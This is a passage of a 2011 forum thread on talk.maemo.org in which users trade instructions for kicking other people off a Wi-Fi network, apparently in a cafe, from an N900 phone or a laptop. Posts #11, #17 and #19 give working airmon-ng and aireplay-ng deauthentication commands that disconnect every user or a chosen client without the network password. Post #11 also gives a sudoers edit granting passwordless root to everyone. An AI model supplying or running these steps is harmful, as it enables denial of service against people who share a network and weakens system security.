Active Topics

 


Reply
Thread Tools
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#11
lol now that is funny

first arpspoof doesn't work unless installing libnet from packages.debian.org

second that command from a desktop pc doesn't cut of users
it makes a mitm (man in the middle)

third for solving sudo problem :

-----------------------------------------
sudo gainroot

echo "user ALL=(ALL) NOPASSWD: ALL" >> everybody.sudoers
echo "root ALL=(ALL) NOPASSWD: ALL" >> everybody.sudoers
mv everybody.sudoers /etc/sudoers.d
update-sudoers

--------------------------------------------------------------

fourth for cutting users from network
you need kernel-power 47 or 46-wl

and
injection drivers
and
aircrack-ng

and a fix i have posted in hacking with n900 tutorial

then

airmon-ng start wlan0
aireplay-ng -0 0 -a (bssid of the network) mon0 #will disconnect every one without even knowing the pass of the wireless network
or
aireplay-ng -0 0 -a (bssid of the network) -c (bssid of specified client) mon0# will disconnect specified user without knowing the pass of the network



For more details of installing aircrack-ng dsniff check my thread

[Tutorial] Hacking With N900
http://talk.maemo.org/showthread.php...2&goto=newpost
 

The Following 10 Users Say Thank You to karam For This Useful Post:
AgogData's Avatar
Posts: 870 | Thanked: 133 times | Joined on Aug 2010
#12
Thnaks karam (though i don't see the funny part of it, but maybe you do) and for all slow people i didn't say this is THE way, i said :
Is this method working ? or is there is any other way ?
 
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#13
Originally Posted by AgogData View Post
Thnaks karam (though i don't see the funny part of it, but maybe you do) and for all slow people i didn't say this is THE way, i said :
Correct i saw it funny cause i use mitm a lot
and using it to cut users off is funny for me
 

The Following User Says Thank You to karam For This Useful Post:
Temporal's Avatar
Posts: 323 | Thanked: 189 times | Joined on Oct 2010 @ Brazil
#14
And this is just one of lots of examples of why anarchy (and by analogy) libertarianism/corporatocracy will NEVER work.
__________________
Love and Goodness are not a property. Are not a franchising. They are present in each one of us, and must be cultivated with KNOWLEDGE.
 
laasonen's Avatar
Posts: 565 | Thanked: 618 times | Joined on Jun 2010 @ Finland
#15
Originally Posted by karam View Post
airmon-ng start wlan0
aireplay-ng -0 0 -a (bssid of the network) mon0 #will disconnect every one without even knowing the pass of the wireless network
It is saying that mon0 has wrong channel selected.
Code:
[root@laasonen-laptop ~]# airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
2004	NetworkManager
2029	wpa_supplicant
2075	avahi-daemon
2076	avahi-daemon


Interface	Chipset		Driver

wlan0		Intel 3945ABG	iwl3945 - [phy0]
				(monitor mode enabled on mon0)

[root@laasonen-laptop ~]# aireplay-ng -0 0 -a `iwconfig wlan0 | grep "Access Point" | awk '{print $6}'` mon0
17:37:51  Waiting for beacon frame (BSSID: 00:22:6B:F6:7C:43) on channel -1
17:37:52  mon0 is on channel -1, but the AP uses channel 10
[root@laasonen-laptop ~]#
I searched that you can select the channel with -c atribute, but it seems to give error:
Code:
[root@laasonen-laptop ~]# airmon-ng start wlan0 -c 10


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
2004	NetworkManager
2029	wpa_supplicant
2075	avahi-daemon
2076	avahi-daemon


Interface	Chipset		Driver

wlan0		Intel 3945ABG	iwl3945 - [phy0]/usr/sbin/airmon-ng: line 454: [: -c: integer expression expected

				(monitor mode enabled on mon2)
mon0		Intel 3945ABG	iwl3945 - [phy0]
mon1		Intel 3945ABG	iwl3945 - [phy0]

[root@laasonen-laptop ~]#
What I'm doing wrong?
 
Captwheeto's Avatar
Posts: 302 | Thanked: 193 times | Joined on Oct 2008 @ England
#16
Originally Posted by Temporal View Post
And this is just one of lots of examples of why anarchy (and by analogy) libertarianism/corporatocracy will NEVER work.
Wrong thread? Some script kiddy wanting to know how to to poison an ARP table is reason to believe that nothing but a right wing, knowledge restricting set of ideals will help the global population.

Or the cafe could, you know, lock and monitor the ARP tables?
 
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#17
@laasonen
do this:

airmon-ng start wlan0
airodump-ng mon0

(check the bssid of the network you want and copy it)
and check the channel of it
let us assume it is on channel 11 and the bssid of it is 00:11:22:33:44:55 then:

iwconfig mon0 channel 11
aireplay-ng -0 0 -a 00:11:22:33:44:55 mon0

now every thing should be fine
 

The Following User Says Thank You to karam For This Useful Post:
AgogData's Avatar
Posts: 870 | Thanked: 133 times | Joined on Aug 2010
#18
Nice tags guys :P
and the d*ck who made the spoon fed tag, can you converte all of this to a .deb file so its easier ? and maybe send it to my phone installed ?
 
laasonen's Avatar
Posts: 565 | Thanked: 618 times | Joined on Jun 2010 @ Finland
#19
Originally Posted by karam View Post
@laasonen
do this:

airmon-ng start wlan0
airodump-ng mon0

(check the bssid of the network you want and copy it)
and check the channel of it
let us assume it is on channel 11 and the bssid of it is 00:11:22:33:44:55 then:

iwconfig mon0 channel 11
aireplay-ng -0 0 -a 00:11:22:33:44:55 mon0

now every thing should be fine
Decided to try with my phone (kernel-power v47 + bleeding edge drivers), but it just gives error:
Code:
Nokia-N900:~# airmon-ng start wlan0
BusyBox v1.18.4 (Debian 1.18.4power5) multi-call binary.

Usage: ps 

Show list of processes

Options:
	w	Wide output



Interface	Chipset		Driver

wlan0		TI WL1251	wl12xx - [phy0]

ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from
http://wireless.kernel.org/download/iw/iw-0.9.22.tar.bz2


Nokia-N900:~#
Hmm, reason is probably busybox-power.

No, still same error:
Code:
Nokia-N900:~# airmon-ng start wlan0


Interface	Chipset		Driver

wlan0		TI WL1251	wl12xx - [phy0]

ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from
http://wireless.kernel.org/download/iw/iw-0.9.22.tar.bz2


Nokia-N900:~#
It seems to be using the old wl12xx driver, even though I have the wl1251 loaded instead of it:
Code:
Nokia-N900:~# cat /proc/modules | grep wl12
wl1251_spi 4224 0 - Live 0xbf02f000
wl1251 79808 1 wl1251_spi, Live 0xbf137000
mac80211 220024 2 wl1251_spi,wl1251, Live 0xbf318000
cfg80211 154472 2 wl1251,mac80211, Live 0xbf103000
crc7 1216 1 wl1251_spi, Live 0xbf100000
Nokia-N900:~#
I also tried to do the soft link fix, but only file I was missing from /usr/bin was makeivs, if I remember right.

Last edited by laasonen; 2011-06-02 at 04:08.
 
Posts: 2,225 | Thanked: 3,822 times | Joined on Jun 2010 @ Florida
#20
laasonen:

If you've used airmon-ng to make a mon0 interface, your wlan0 interface is still in normal managed mode, and you should use "mon0" as the interface over which to inject and capture packets, etc.

Also, you need to have iw installed in order to use airmon-ng (without it, airmon-ng doesn't work, and instead of getting a convenient mon0 interface, you have to manually put wlan0 into monitor mode using iwconfig). iw, however, currently conflicts with aircrack-ng. I've removed the conflict in iw's control file, but can't get iw to build right in the autobuilder yet, so in the meantime, there's a .deb I've precompiled in the [Announce] Aircrack-NG 1.1 thread, about 30-or-so posts in, that you can install instead of the iw in the repositories, which doesn't conflict with the aircrack-ng in the repository.
 

The Following 2 Users Say Thank You to Mentalist Traceur For This Useful Post:
Reply

Tags
hacking, hax!! *monitor*, no harm done, script kiddies, spoon fed


 
Forum Jump


All times are GMT. The time now is 12:35.